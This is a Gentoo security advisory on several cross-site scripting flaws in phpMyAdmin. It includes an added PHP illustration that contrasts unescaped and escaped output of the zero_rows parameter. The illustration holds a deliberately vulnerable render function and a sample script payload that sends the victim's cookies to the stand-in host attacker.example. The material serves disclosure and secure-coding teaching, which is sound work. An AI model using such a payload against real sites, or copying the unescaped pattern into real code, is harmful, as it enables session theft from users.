phpMyAdmin: Multiple XSS vulnerabilities — GLSA 200411-36

phpMyAdmin is vulnerable to cross-site scripting attacks.

Affected packages

dev-db/phpmyadmin on all architectures
Affected versions < 2.6.0_p3
Unaffected versions >= 2.6.0_p3

Background

phpMyAdmin is a tool written in PHP for administering MySQL databases from a web browser.

Description

Cedric Cochin has discovered multiple cross-site scripting vulnerabilities in phpMyAdmin. These vulnerabilities can be exploited through the PmaAbsoluteUri parameter, the zero_rows parameter of read_dump.php, the confirm form, or an error message generated by the internal phpMyAdmin parser: values supplied through these inputs end up in the generated HTML without adequate encoding.

Impact

By sending a specially-crafted request (typically a link the victim is induced to follow), an attacker can inject script code that executes in the victim's browser in the context of the phpMyAdmin site, with access to the victim's session and to whatever database actions that session permits.
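The following is an added illustration of the bug class described above; it is not phpMyAdmin code and is not taken from the advisory. It shows a hypothetical handler that reflects a request parameter into an HTML notice the way the advisory describes for zero_rows in read_dump.php, first without encoding and then with an HTML-context escaper. The script structure, the notice markup, the html_escape helper and the sample payload are all assumptions made for this example.

```php
<?php
// Added illustration, not phpMyAdmin code: a hypothetical handler that reflects
// a request parameter into an HTML notice, the pattern the advisory describes
// for zero_rows in read_dump.php. The script name, messages and the hardened
// helper are assumptions made for this example.
declare(strict_types=1);

// Vulnerable pattern: the user-controlled value is concatenated into markup as-is.
function render_notice_unsafe(string $zero_rows): string
{
    return '<p class="notice">' . $zero_rows . '</p>';
}

// Hardened pattern: encode for the HTML text/attribute context before output.
// ENT_QUOTES covers both quote characters, so the helper is also safe inside
// value="..." attributes; ENT_SUBSTITUTE avoids returning an empty string on
// invalid UTF-8 (which would otherwise silently drop the message).
function html_escape(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_notice_safe(string $zero_rows): string
{
    return '<p class="notice">' . html_escape($zero_rows) . '</p>';
}

// Crude reviewer check: does a raw <script tag survive into the response body?
function script_tag_survives(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed payload standing in for a crafted ?zero_rows=... query string.
$constructed_payload = '<script>document.location="http://attacker.example/?c="'
    . '+document.cookie</script>';

// Under a web server the value comes from the request; on the CLI fall back to
// the constructed payload so the example runs offline.
$zero_rows = $_GET['zero_rows'] ?? $constructed_payload;

if (PHP_SAPI !== 'cli') {
    // The declared charset must match the one passed to the escaper.
    header('Content-Type: text/html; charset=UTF-8');
}

$unsafe = render_notice_unsafe($zero_rows);
$safe   = render_notice_safe($zero_rows);

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";
echo 'script tag survives (unsafe): ' . var_export(script_tag_survives($unsafe), true) . "\n";
echo 'script tag survives (safe):   ' . var_export(script_tag_survives($safe), true) . "\n";
```

Run it from the command line with `php` on a file of any name, or drop it behind a web server and pass `?zero_rows=` yourself. The escaper shown is correct only for the HTML text and quoted-attribute contexts; a value that is used to build a URL (the PmaAbsoluteUri case, where the parameter feeds absolute links) or that lands inside an inline script block needs validation or encoding specific to that context, and HTML escaping alone does not make it safe.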

Workaround

There is no known workaround at this time.

Resolution

All phpMyAdmin users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.0_p3"

References

Release date
November 27, 2004

Latest revision
November 27, 2004: 01

Severity
low

Exploitable
remote

Bugzilla entries